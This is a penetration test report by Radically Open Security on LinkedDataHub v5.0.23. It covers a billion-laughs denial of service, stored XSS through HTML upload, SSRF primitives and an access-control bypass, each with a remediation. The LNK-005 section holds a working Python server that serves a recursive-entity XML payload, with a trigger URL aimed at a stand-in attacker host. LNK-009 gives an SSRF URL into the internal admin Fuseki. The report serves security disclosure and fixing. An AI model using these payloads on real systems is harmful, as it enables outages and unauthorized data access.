Skip to content

Penetration test report

Martynas Jusevičius edited this page Nov 24, 2025 · 1 revision

Penetration Test Report - LinkedDataHub

Version: 1.0 Date: Amsterdam, October 1st, 2025 Classification: Confidential

Document Properties

Property Value
Client LinkedDataHub
Title Penetration Test Report
Target LinkedDataHub v5.0.23
Version 1.0
Pentester Thomas Rinsma
Authors Thomas Rinsma, Marcus Bointon
Reviewed by Marcus Bointon
Approved by Melanie Rieback

Version Control

Version Date Author Description
0.1 September 23rd, 2025 Thomas Rinsma Initial draft
0.2 September 29th, 2025 Marcus Bointon Review
1.0 October 1st, 2025 Marcus Bointon 1.0

Contact

For more information about this document and its contents please contact Radically Open Security B.V.

Name Melanie Rieback
Address Science Park 608, 1098 XH Amsterdam, The Netherlands
Phone +31 (0)20 2621 255
Email info@radicallyopensecurity.com

1. Executive Summary

1.1 Introduction

Between September 16, 2025 and September 24, 2025, Radically Open Security B.V. carried out a penetration test of LinkedDataHub.

This report contains our findings as well as detailed explanations of exactly how ROS performed the penetration test.

1.2 Scope of Work

The scope of the penetration test was limited to the following target:

  • LinkedDataHub v5.0.23

The scoped services are broken down as follows:

  • Audit and pentest of LinkedDataHub: 5 days
  • Total effort: 5 days

1.3 Project Objectives

ROS will perform a code audit and penetration test of LinkedDataHub in order to assess its security. To do so, ROS will audit LinkedDataHub and guide its developers in attempting to find vulnerabilities, exploiting any such found to try and gain further access and elevated privileges.

1.4 Timeline

The security audit took place between September 16, 2025 and September 24, 2025.

1.5 Results In A Nutshell

During this crystal-box penetration test we found 2 High, 2 Elevated and 2 Low-severity issues.

LinkedDataHub is an open and flexible platform allowing users to upload, query, and retrieve data both internal and external to the system. This openness makes it inherently vulnerable to attacks that exploit these functionalities, such as Server-Side Request Forgery (SSRF) and Cross-Site Scripting (XSS).

A stored XSS vulnerability in LNK-011 allows both HTML and JavaScript injection by authenticated users that could result in account takeover.

While LinkedDataHub provides the ability to configure granular access control rules, we find that few permissions are required to exploit some of the more severe issues found during this pentest. Most critically, LNK-005 allows a regular end-user to crash the LinkedDataHub instance, resulting in complete denial of service.

The various SSRF primitives found in LNK-002 and LNK-003 can be exploited by any authenticated user, and LNK-004 by admins, all allowing some degree of reading of internal resources, including the Fuseki admin interface as shown in LNK-009.

1.6 Summary of Findings

Info Description
LNK-005 (High) - Denial-of-Service XML entities are recursively expanded when parsing RDF content, leading to a so-called billion laughs attack, filling the server's memory and causing Docker to kill LinkedDataHub containers.
LNK-011 (High) - Cross-Site Scripting By simply uploading an HTML file through the LinkedDataHub user interface, a stored XSS attack can be performed.
LNK-003 (Elevated) - Server-Side Request Forgery The uri functionality to load external RDF datasets allows attackers to query internal network and system resources.
LNK-009 (Elevated) - Access control bypass By using the uri proxy functionality, a non-admin user is able to access resources stored in fuseki-admin.
LNK-002 (Low) - Server-Side Request Forgery The endpoint /admin/transform allows attackers to query network- and system-internal resources via the dct:source and spin:query parameters.
LNK-004 (Low) - Server-Side Request Forgery The On-Behalf-Of header used for delegated authentication allows attackers to query network- and system-internal resources.

1.7 Summary of Recommendations

Info Recommendation
LNK-005 (High) Configure the XML parser so that XML entities are not expanded, or that there is at least a recursion limit.
LNK-011 (High) For file uploads, don't allow MIME-types that are actively interpreted by browsers, such as those belonging to HTML and CSS. Use the Content-disposition header to serve the files as attachments instead.
LNK-003 (Elevated) Limit server-side HTTP fetch mechanisms as much as possible, ideally with allow lists. If this is not possible, it may be beneficial to implement domain filtering to restrict such internal access, but be aware of DNS (rebinding) attacks, which could bypass such filters.
LNK-009 (Elevated) Limit server-side HTTP fetch mechanisms as much as possible, ideally with allow lists. If this is not possible, it may be beneficial to implement domain filtering to restrict such internal access, but be aware of DNS (rebinding) attacks, which could bypass such filters.
LNK-002 (Low) Limit server-side HTTP fetch mechanisms as much as possible, ideally with allow lists. If this is not possible, it may be beneficial to implement domain filtering to restrict such internal access, but be aware of DNS (rebinding) attacks, which could bypass such filters.
LNK-004 (Low) Limit server-side HTTP fetch mechanisms as much as possible, ideally with allow lists. If this is not possible, it may be beneficial to implement domain filtering to restrict such internal access, but be aware of DNS (rebinding) attacks, which could bypass such filters.

2. Methodology

2.1 Planning

Our general approach during penetration tests is as follows:

  1. Reconnaissance We attempt to gather as much information as possible about the target. Reconnaissance can take two forms: active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection afforded to the app or network. This usually involves trying to discover publicly available information by visiting websites, newsgroups, etc. An active form would be more intrusive, could possibly show up in audit logs and might take the form of a social engineering type of attack.

  2. Enumeration We use various fingerprinting tools to determine what hosts are visible on the target network and, more importantly, try to ascertain what services and operating systems they are running. Visible services are researched further to tailor subsequent tests to match.

  3. Scanning Vulnerability scanners are used to scan all discovered hosts for known vulnerabilities or weaknesses. The results are analyzed to determine if there are any vulnerabilities that could be exploited to gain access or enhance privileges to target hosts.

  4. Obtaining Access We use the results of the scans to assist in attempting to obtain access to target systems and services, or to escalate privileges where access has been obtained (either legitimately though provided credentials, or via vulnerabilities). This may be done surreptitiously (for example to try to evade intrusion detection systems or rate limits) or by more aggressive brute-force methods. This step also consist of manually testing the application against the latest (2021) list of OWASP Top 10 risks. The discovered vulnerabilities from scanning and manual testing are moreover used to further elevate access on the application.

2.2 Risk Classification

Throughout the report, vulnerabilities or risks are labeled and categorized according to the Penetration Testing Execution Standard (PTES). For more information, see: http://www.pentest-standard.org/index.php/Reporting

These categories are:

  • Extreme - Extreme risk of security controls being compromised with the possibility of catastrophic financial/reputational losses occurring as a result.
  • High - High risk of security controls being compromised with the potential for significant financial/reputational losses occurring as a result.
  • Elevated - Elevated risk of security controls being compromised with the potential for material financial/reputational losses occurring as a result.
  • Moderate - Moderate risk of security controls being compromised with the potential for limited financial/reputational losses occurring as a result.
  • Low - Low risk of security controls being compromised with measurable negative impacts as a result.

3. Findings

3.1 LNK-005 — Denial of service through entity expansion in RDF processing

Vulnerability ID LNK-005
Vulnerability type Denial-of-Service
Threat level High

Description

XML entities are recursively expanded when parsing RDF content, leading to a so-called billion laughs attack, filling the server's memory and causing Docker to kill LinkedDataHub containers.

Technical description

Through the uri dataset retrieval feature detailed in LNK-003, it is possible to pass arbitrary RDF data to a LinkedDataHub instance for it to process. It turns out that when processing XML-formatted RDF data, LinkedDataHub will attempt to expand XML entities in a recursive manner, without any constraints. This results in a so-called billion laughs attack, where a small payload can be crafted, expanding to a multi-gigabytes-sized buffer in memory.

Because LinkedDataHub is configured with memory limits through docker-compose, processing such a payload will cause Docker to kill LinkedDataHub, or one of the other containers in the docker-compose file.

To demonstrate, the following Python script serves the billion laughs payload with an application/rdf+xml MIME-type:

from http.server import BaseHTTPRequestHandler, HTTPServer

HOST = '0.0.0.0'
PORT = 1337
RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE rdf:RDF [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
  <!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
  ]>
  <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
           xmlns:foaf="http://xmlns.com/foaf/0.1/">
    <foaf:Person>
        <foaf:name>&lol9;</foaf:name>
    </foaf:Person>
  </rdf:RDF>
"""

class SimpleXMLHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type', 'application/rdf+xml')
        self.end_headers()
        self.wfile.write(RESPONSE.encode('utf-8'))

if __name__ == "__main__":
    server = HTTPServer((HOST, PORT), SimpleXMLHandler)
    print(f"Serving on http://{HOST}:{PORT}")
    server.serve_forever()

The denial-of-service can be triggered by accessing the following URL:

https://localhost:4443/?uri=<ATTACKER_IP>:1337

Impact

Any (non-admin) user with privileges to use the uri proxy functionality can easily abuse this vulnerability to take down a LinkedDataHub instance with a couple of HTTP requests. As this has a high impact on availability, the threat level is high.

Recommendation

  • Configure the XML parser so that XML entities are not expanded, or that there is at least a recursion limit.

3.2 LNK-011 — Javascript execution (XSS) through HTML file upload

Vulnerability ID LNK-011
Vulnerability type Cross-Site Scripting
Threat level High

Description

By simply uploading an HTML file through the LinkedDataHub user interface, a stored XSS attack can be performed.

Technical description

Through the LinkedDataHub user interface, it is possible for a user with the right permissions to upload files and configure them to be served with an arbitrary MIME-type. Hence, by configuring the right MIME-type, an uploaded HTML file will be interpreted by the browser as HTML.

This uploaded file is served from the uploads/ folder on the same domain as other LinkedDataHub functionality, e.g.:

https://localhost:4443/uploads/71962b2ede736f98707833750c0f5ea4e3e83185

Because the attacker has full control over the HTML and JavaScript in this file, this enables attacks such as:

  • Phishing: presenting a fake LinkedDataHub login form, sending entered credentials to the attacker's server.
  • Cookie theft: using JavaScript to obtain the user's cookies and stealing OAuth-related authentication data.
  • Impersonation: using JavaScript, the page could perform any action in the name of the victim user (e.g., an admin) by sending background request, all without the victim's knowledge.

Impact

By crafting a malicious HTML file and sending this to a victim user (e.g., an admin), an attacker can control or even fully take over the victim's LinkedDataHub account. Hence, the impact is high.

Recommendation

  • For file uploads, don't allow MIME-types that are actively interpreted by browsers, such as those belonging to HTML and CSS.
  • Use the Content-disposition header to serve the files as attachments instead.

3.3 LNK-003 — SSRF primitive via uri query parameter

Vulnerability ID LNK-003
Vulnerability type Server-Side Request Forgery
Threat level Elevated

Description

The uri functionality to load external RDF datasets allows attackers to query internal network and system resources.

Technical description

If the user has the right permissions and makes a request to /?uri=http://example.org, LinkedDataHub will attempt to fetch http://example.org with a GET request, looking for an RDF-formatted response type or HTML containing JSON-formatted RDF in a script-tag. The resulting data is interpreted and shown to the user in a formatted manner.

A vulnerability arises when there are services internal to the server or network on which LinkedDataHub is running, which return RDF(-like) data. An attacker could abuse this proxy functionality to gain read access to that data. For example, LNK-009 shows how this causes an access control bypass vulnerability within LinkedDataHub itself.

Impact

While LNK-009 shows a direct impact on LinkedDataHub itself, the overall impact of this issue depends on the system and surrounding network in which LinkedDataHub is deployed.

Importantly, no admin privileges are required to execute these requests, but the HTTP response is not directly returned to the attacker, and instead processed for RDF data. This makes the attack partially blind.

Recommendation

  • Limit server-side HTTP fetch mechanisms as much as possible, ideally with allow lists.
  • If this is not possible, it may be beneficial to implement domain filtering to restrict such internal access, but be aware of DNS (rebinding) attacks, which could bypass such filters.

3.4 LNK-009 — Indirect access to fuseki-admin via uri feature

Vulnerability ID LNK-009
Vulnerability type Access control bypass
Threat level Elevated

Description

By using the uri proxy functionality, a non-admin user is able to access resources stored in fuseki-admin.

Technical description

LinkedDataHub splits data between the end-user and admin Fuseki instances. Regular users normally only have limited access to data stored in admin, as enforced by LinkedDataHub itself, which normally proxies all data access.

However, the uri query parameter effectively exposes a Server-Side Request Forgery (SSRF) primitive (as detailed in LNK-003), where the LinkedDataHub backend will make a GET request to an HTTP endpoint, interpreting and serving the result if it is in a known RDF format. We can abuse this by constructing a URL pointing to the admin Fuseki server at http://fuseki-admin:3030 in the Docker network, passing an arbitrary SPARQL query using the /ds/?query= endpoint. The resulting RDF data is then neatly served by LinkedDataHub, bypassing any access control.

As an example, to run the following query on the admin instance:

SELECT ?msg
WHERE {
  BIND("hello world" AS ?msg)
}

we'd URL-encode it, and construct the following URL:

http://fuseki-admin:3030/ds/?query=SELECT%20%3Fmsg%0AWHERE%20%7B%0A%20%20BIND%28%22hello%20world%22%20AS%20%3Fmsg%29%0A%7D

which we then URL-encode again, and pass to the LinkedDataHub front-end, as the uri parameter.

Similarly, this technique can be used to show the full list of users and their properties (e.g., email address) to a non-admin user.

Impact

This vulnerability effectively bypasses any access control for read-access to any data in either of the Fuseki instances. Depending on what data is stored, the impact varies. In a default installation, this allows a user with access to the uri feature to enumerate all users and related admin data (e.g., ACLs), leading to a potential privacy issue.

Recommendation

  • Limit server-side HTTP fetch mechanisms as much as possible, ideally with allow lists.
  • If this is not possible, it may be beneficial to implement domain filtering to restrict such internal access, but be aware of DNS (rebinding) attacks, which could bypass such filters.

3.5 LNK-002 — SSRF primitives in admin endpoint

Vulnerability ID LNK-002
Vulnerability type Server-Side Request Forgery
Threat level Low

Description

The endpoint /admin/transform allows attackers to query network- and system-internal resources via the dct:source and spin:query parameters.

Technical description

When processing a POST request, the Transform class extracts the spin:query and dct:source properties from the RDF payload and makes unvalidated HTTP GET requests to these URLs.

Specifically, QueryLoader fetches a SPIN query resource from the URL provided in spin:query via LinkedDataClient.get(), and LinkedDataClient is used to fetch RDF data from the dct:source URL for transformation processing:

LinkedDataClient ldc = LinkedDataClient.create(getSystem().getClient(),
  getSystem().getMediaTypes()).delegation(getUriInfo().getBaseUri(), getAgentContext().orElse(null));
QueryLoader queryLoader = new QueryLoader(URI.create(queryRes.getURI()),
  getApplication().getBase().getURI(), Syntax.syntaxARQ, ldc);
Query query = queryLoader.get();

if (!query.isConstructType()) throw new BadRequestException("Transformation query is not of CONSTRUCT type");

Model importModel = ldc.getModel(source.getURI());
try (QueryExecution qex = QueryExecution.create(query, importModel))
{
    Model transformModel = qex.execConstruct();
    importModel.add(transformModel); // append transform results
    // forward the stream to the named graph document -- do not directly append triples to graph
    // because the agent might not have access to it
    return forwardPost(Entity.entity(importModel,
      com.atomgraph.core.MediaType.APPLICATION_NTRIPLES_TYPE), graph.getURI());
}

Impact

As partial content of the HTTP response is returned, this may allow an attacker to obtain information about systems internal to the server or network on which LinkedDataHub is running. However, as only partial content is returned and admin privileges are required to exploit this vulnerability, the impact is low.

Recommendation

  • Limit server-side HTTP fetch mechanisms as much as possible, ideally with allow lists.
  • If this is not possible, it may be beneficial to implement domain filtering to restrict such internal access, but be aware of DNS (rebinding) attacks, which could bypass such filters.

3.6 LNK-004 — SSRF primitive via On-Behalf-Of header

Vulnerability ID LNK-004
Vulnerability type Server-Side Request Forgery
Threat level Low

Description

The On-Behalf-Of header used for delegated authentication allows attackers to query network- and system-internal resources.

Technical description

As part of its WebID support, LinkedDataHub supports delegated authentication via the On-Behalf-Of header, shown in the snippet below.

The value in this header normally points to an external resource (an HTTP URL), but this is not verified by LinkedDataHub. Hence, an attacker could specify a URL pointing to a resource internal to the server or network containing the LinkedDataHub instance, and this will be fetched by the LinkedDataHub backend.

String onBehalfOf = request.getHeaderString(ON_BEHALF_OF);
if (onBehalfOf != null)
{
    URI principalWebID = new URI(onBehalfOf);
    Model principalWebIDModel = loadWebID(principalWebID);
    Resource principal = principalWebIDModel.createResource(onBehalfOf);
    // if we verify that the current agent is a secretary of the principal, that principal becomes
    // current agent. Else throw error
    if (agent.equals(principal) || principal.getModel().contains(agent, ACL.delegates, principal))
    {
        agent = principal;
        getSystem().getWebIDModelCache().put(principalWebID, principal.getModel()); // now it's safe
        // to cache the principal's Model
    }
    else throw new WebIDDelegationException(agent, principal);
}

Impact

No admin privileges are required to execute these requests. However, the internal request uses a GET method (limiting it to read-only actions) and only a small part of the HTTP response is returned to the attacker. This makes the attack unlikely to affect most services and partially blind. This results in a low overall impact.

Recommendation

  • Limit server-side HTTP fetch mechanisms as much as possible, ideally with allow lists.
  • If this is not possible, it may be beneficial to implement domain filtering to restrict such internal access, but be aware of DNS (rebinding) attacks, which could bypass such filters.

4. Non-Findings

In this section we list some of the things that were tried but turned out to be dead ends.

4.1 NF-001 — Older Fuseki version containing known vulnerabilities

LinkedDataHub uses Fuseki 4.7.0. This version has known flaws in which the scripting engine is enabled by default (CVE-2023-32200 and CVE-2023-22665). Luckily, this does not seem to impact LinkedDataHub as the minimal Java 21 installation used in the AtomGraph/fuseki-docker container does not include Graal.js or any other scripting engine. Nevertheless, we recommend keeping Fuseki up to date.

4.2 NF-006 — Potential cache poisoning

We tried to perform cache poisoning attacks against the Varnish configuration but were unsuccessful.

Specifically, we tested Host header-based cache poisoning by manipulating the Host header to poison cached responses for other users. If successful, this might allow an attacker to cause victims to load the attacker's JavaScript resources as opposed to the intended ones. However, we found that:

  • the Varnish configuration in docker-compose.yml:316 uses req.url == bereq.url && req.http.host == bereq.http.host for cache invalidation, hence a different Host header should invalidate the cache entry;
  • LinkedDataHub does not appear to use the Host header in constructing resource links.

Hence, no such issue is present in LinkedDataHub.

4.3 NF-008 — Potential argument injection in WebIDCertGen

The generate method in com.atomgraph.linkeddatahub.server.util.WebIDCertGen appears to be vulnerable to argument injection:

String[] args =
{
    "-genkeypair",
    "-keyalg", getKeyAlg(),
    "-storetype", getStoreType(),
    "-keystore", keyStorePath.toString(),
    "-storepass", storePass,
    "-keypass", keyPass,
    "-alias", alias,
    "-dname", dName,
    "-ext", "SAN=uri:" + webIDURI,
    "-validity", String.valueOf(validity)
};

sun.security.tools.keytool.Main.main(args);

However, this is not exploitable because the keytool library properly sanitizes and validates all input parameters before execution. The keytool implementation uses safe parameter binding that prevents command injection attacks, and all user-supplied values are treated as data rather than parameter names or commands, making argument injection impossible.


5. Future Work

  • Keep dependencies up-to-date and follow security best practices Ensure that critical dependencies such as Fuseki and other Jena libraries are kept up to date and follow best practices regarding configuration to minimize the overall attack surface.

  • Retest of findings When mitigations for the vulnerabilities described in this report have been deployed, perform a repeat test to ensure that they are effective and have not introduced other security problems.

  • Regular security assessments Security is a process that must be continuously evaluated and improved; this penetration test is just a single snapshot. Regular audits and ongoing improvements are essential in order to maintain control of your corporate information security.


6. Conclusion

We discovered 2 High, 2 Elevated and 2 Low-severity issues during this penetration test.

Overall, we find that LinkedDataHub is a very flexible platform which places a relatively high amount of trust in its users. Once a user is registered and obtains basic access permissions, they can abuse core functionality (e.g. external RDF dataset lookup and file uploads) to perform unintended actions and eventually even escalate their privileges. These problems show that more focus could be placed on security, specifically with threat models associated with registered, non-admin users.

We recommend fixing all of the issues found and then performing a retest in order to ensure that mitigations are effective and that no new vulnerabilities have been introduced.

Finally, we want to emphasize that security is a process that must be continuously evaluated and improved; this penetration test is just a one-time snapshot. Regular audits and ongoing improvements are essential in order to maintain control of your corporate information security. We hope that this pentest report (and the detailed explanations of our findings) will contribute meaningfully towards that end.

Please don't hesitate to let us know if you have any further questions, or need further clarification on anything in this report.


Appendix 1: Testing Team

Name Description
Thomas Rinsma Thomas Rinsma is a security analyst and hobby hacker. His specialty is in application-level software security, with a tendency for finding bugs in open-source dependencies resulting in various CVEs. Professionally, he has experience testing everything from hypervisors to smart meters, but anything with a security boundary to bypass interests him.
Melanie Rieback Melanie Rieback is a former Asst. Prof. of Computer Science from the VU, who is also the co-founder/CEO of Radically Open Security.

Clone this wiki locally